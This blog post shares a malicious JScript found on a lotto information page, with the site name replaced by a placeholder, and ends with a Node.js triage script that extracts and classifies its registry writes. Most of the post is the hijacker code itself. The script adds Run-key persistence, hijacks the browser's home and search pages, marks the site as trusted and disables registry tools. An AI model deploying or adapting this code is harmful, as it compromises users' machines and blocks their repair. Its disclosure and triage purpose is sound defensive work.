
Registry altering web page

I found this amusing today. It is a JavaScript that was linked to a lotto information page. It changed some rather important registry keys.

I’ve broken up some of the lines of code to make it fit this blog theme.

var url = "http://EVIL_SITE";
var burl = "http://EVIL_SITE";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\system32\\EVIL.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\RunOnce\\Windows",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run\\System32",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url1","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url2","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url3","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url4","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url5","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url6","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url7","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url8","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url9","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url10","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url11","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\
YMSGR_Calendar\\content url","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\
YMSGR_Games\\content url","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\
YMSGR_Launchcast\\content url","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\
YMSGR_Weather\\content url","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\
YMSGR_Weather\\content url","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Internet Settings\\ZoneMap\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Internet Settings\\ZoneMap\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Internet Settings\\ZoneMap\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Internet Settings\\ZoneMap\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Internet Settings\\ZoneMap\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Internet Settings\\ZoneMap\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Policies\\System\\DisableRegistryTools",1,
"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Policies\\Microsoft\\
Internet Explorer\\Control Panel\\Homepage",1,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\window title","-� EVIL_SITE �-");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\default_page_url","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\First Home Page","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Save_Session_History_On_Exit","no");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Toolbar\\LinksFolderName",".::EVIL_SITE::. ");
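
For triage, the registry writes in a sample like the one above can be extracted and grouped by effect without running the script. The Node.js sketch below is an added example, not part of the original post; the category names, the rule patterns and the constructed SAMPLE input are assumptions of the example.

```javascript
// Added example: static triage of WScript.Shell RegWrite calls in a script sample.
// SAMPLE is constructed, modelled on the listing above; EVIL_SITE is a placeholder.
const SAMPLE = String.raw`
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run\\System32",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Internet Settings\\ZoneMap\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Policies\\System\\DisableRegistryTools",1,
"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url1","http://EVIL_SITE");
`;

// Category names and patterns are this example's own (hypothetical); first match wins.
const RULES = [
  ["persistence", /\\currentversion\\run(once)?\\/],
  ["tooling-lockout", /\\policies\\system\\disableregistrytools$/],
  ["settings-lockout", /\\policies\\microsoft\\internet explorer\\control panel\\/],
  ["zone-tampering", /\\internet settings\\zonemap\\/],
  ["browser-hijack", /\\internet explorer\\(main|toolbar)\\/],
  ["history-seeding", /\\internet explorer\\typedurls\\/],
  ["app-content-redirect", /\\yahoo\\pager\\view\\/],
];

// Treat single and doubled backslashes alike so both spellings in the listing match.
function normalizeKey(raw) {
  return raw.replace(/\\+/g, "\\");
}

function classify(key) {
  const k = key.toLowerCase();
  const hit = RULES.find(([, re]) => re.test(k));
  return hit ? hit[0] : "other";
}

function triage(source) {
  // The listing wraps long calls across lines, even inside string literals: rejoin first.
  const joined = source.replace(/\r?\n/g, "");
  const call = /\.RegWrite\(\s*"([^"]*)"\s*,\s*("[^"]*"|[^,)]+)/g;
  return [...joined.matchAll(call)].map((m) => {
    const key = normalizeKey(m[1]);
    return { key, value: m[2].trim(), category: classify(key) };
  });
}

for (const f of triage(SAMPLE)) console.log(f.category.padEnd(20), f.key, "<-", f.value);
```

Anything reported as persistence or tooling-lockout is the first thing to check on a host that loaded such a page, since those writes survive a reboot and block the registry editor.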
